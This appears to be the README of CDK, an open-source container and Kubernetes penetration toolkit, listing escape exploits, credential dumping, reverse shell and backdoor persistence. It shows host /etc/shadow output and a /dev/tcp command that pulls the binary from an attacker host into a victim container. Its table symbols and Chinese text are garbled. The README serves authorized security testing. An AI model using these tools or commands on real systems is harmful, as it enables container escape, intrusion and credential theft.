English
Usage of CDK for attacking targets without prior mutual consent is illegal. CDK is for security testing purposes only.
CDK is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs and helps you to escape container and take over K8s cluster easily.
Run cdk eva to get evaluate info and a recommend exploit, then run cdk run to start the attack.
> ./cdk eva --full
[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.
> ./cdk run cap-dac-read-search
Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::
Download latest release in https://github.com/cdk-team/CDK/releases/
Drop executable files into the target container and start testing.
If you have an exploit that can upload a file, then you can upload CDK binary directly.
If you have a RCE exploit, but the target container has no curl or wget, you can use the following method to deliver CDK:
- First, host CDK binary on your host with public IP.
(on your host)
nc -lvp 999 < cdk
- Inside the victim container execute
cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk
Usage:
cdk evaluate [--full]
cdk run (--list | <exploit> [<args>...])
cdk <tool> [<args>...]
Evaluate:
cdk evaluate Gather information to find weakness inside container.
cdk evaluate --full Enable file scan during information gathering.
Exploit:
cdk run --list List all available exploits.
cdk run <exploit> [<args>...] Run single exploit, docs in https://github.com/cdk-team/CDK/wiki
Auto Escape:
cdk auto-escape <cmd> Escape container in different ways then let target execute <cmd>.
Tool:
vi <file> Edit files in container like "vi" command.
ps Show process information like "ps -ef" command.
nc [options] Create TCP tunnel.
ifconfig Show network information.
kcurl <path> (get|post) <uri> <data> Make request to K8s api-server.
ectl <endpoint> get <key> Unauthorized enumeration of ectd keys.
ucurl (get|post) <socket> <uri> <data> Make request to docker unix socket.
probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000
Options:
-h --help Show this help msg.
-v --version Show version.
CDK has three modules:
- Evaluate: gather information inside container to find potential weakness.
- Exploit: for container escaping, persistance and lateral movement
- Tool: network-tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.
Usage
cdk evaluate [--full]
This command will run the scripts below without local file scanning, using --full to enable all.
| Tactics | Script | Supported | Usage/Example |
|---|---|---|---|
| Information Gathering | OS Basic Info | โ | link |
| Information Gathering | Available Capabilities | โ | link |
| Information Gathering | Available Linux Commands | โ | link |
| Information Gathering | Mounts | โ | link |
| Information Gathering | Net Namespace | โ | link |
| Information Gathering | Sensitive ENV | โ | link |
| Information Gathering | Sensitive Process | โ | link |
| Information Gathering | Sensitive Local Files | โ | link |
| Information Gathering | Kube-proxy Route Localnet(CVE-2020-8558) | โ | link |
| Discovery | K8s Api-server Info | โ | link |
| Discovery | K8s Service-account Info | โ | link |
| Discovery | Cloud Provider Metadata API | โ | link |
List all available exploits:
cdk run --list
Run targeted exploit:
cdk run <script-name> [options]
| Tactic | Technique | CDK Exploit Name | Supported | In Thin | Doc |
|---|---|---|---|---|---|
| Escaping | docker-runc CVE-2019-5736 | runc-pwn | โ | โ | |
| Escaping | containerd-shim CVE-2020-15257 | shim-pwn | โ | link | |
| Escaping | docker.sock PoC (DIND attack) | docker-sock-check | โ | โ | link |
| Escaping | docker.sock RCE | docker-sock-pwn | โ | โ | link |
| Escaping | Docker API(2375) RCE | docker-api-pwn | โ | โ | link |
| Escaping | Device Mount Escaping | mount-disk | โ | โ | link |
| Escaping | LXCFS Escaping | lxcfs-rw | โ | โ | link |
| Escaping | Cgroups Escaping | mount-cgroup | โ | โ | link |
| Escaping | Abuse Unprivileged User Namespace Escaping CVE-2022-0492 | abuse-unpriv-userns | โ | โ | link |
| Escaping | Procfs Escaping | mount-procfs | โ | โ | link |
| Escaping | Ptrace Escaping PoC | check-ptrace | โ | โ | link |
| Escaping | Rewrite Cgroup(devices.allow) | rewrite-cgroup-devices | โ | โ | link |
| Escaping | Read arbitrary file from host system (CAP_DAC_READ_SEARCH) | cap-dac-read-search | โ | โ | link |
| Discovery | K8s Component Probe | service-probe | โ | โ | link |
| Discovery | Dump Istio Sidecar Meta | istio-check | โ | โ | link |
| Discovery | Dump K8s Pod Security Policies | k8s-psp-dump | โ | link | |
| Remote Control | Reverse Shell | reverse-shell | โ | โ | link |
| Remote Control | Kubelet Exec | kubelet-exec | โ | โ | |
| Credential Access | Registry BruteForce | registry-brute | โ | โ | link |
| Credential Access | Access Key Scanning | ak-leakage | โ | โ | link |
| Credential Access | Etcd Get K8s Token | etcd-get-k8s-token | โ | โ | |
| Credential Access | Dump K8s Secrets | k8s-secret-dump | โ | โ | link |
| Credential Access | Dump K8s Config | k8s-configmap-dump | โ | โ | link |
| Privilege Escalation | K8s RBAC Bypass | k8s-get-sa-token | โ | โ | link |
| Persistence | Deploy WebShell | webshell-deploy | โ | โ | link |
| Persistence | Deploy Backdoor Pod | k8s-backdoor-daemonset | โ | โ | link |
| Persistence | Deploy Shadow K8s api-server | k8s-shadow-apiserver | โ | link | |
| Persistence | K8s MITM Attack (CVE-2020-8554) | k8s-mitm-clusterip | โ | โ | link |
| Persistence | Deploy K8s CronJob | k8s-cronjob | โ | โ | link |
Note about Thin: The thin release is prepared for short life container shells such as serverless functions. We add build tags in source code and cut a few exploits to get the binary lighter. The 2MB file contains 90% of CDK functions, also you can pick up useful exploits in CDK source code to build your own lightweight binary.
Running commands like in Linux, little different in input-args, see the usage link.
cdk nc [options]
cdk ps
| Command | Description | Supported | Usage/Example |
|---|---|---|---|
| nc | TCP Tunnel | โ | link |
| ps | Process Information | โ | link |
| ifconfig | Network Information | โ | link |
| vi | Edit Files | โ | link |
| ectl | Unauthorized enumeration of ectd keys | โ | |
| kcurl | Request to K8s api-server | โ | link |
| dcurl | Request to Docker HTTP API | โ | link |
| ucurl | Request to Docker Unix Socket | โ | link |
| rcurl | Request to Docker Registry API | ||
| probe | IP/Port Scanning | โ | link |
| dns | use dns to discovery IP | โ | link |
dns discovery cidr_ipaddress๏ผ้่ฟdnsๅ็ฐipๅฐๅ๏ผไปฅๅไฝฟ็จDNS็PTR่ฎฐๅฝ๏ผๅๆฅๅๅ
$ ./cdk dns discovery 10.0.16.0/16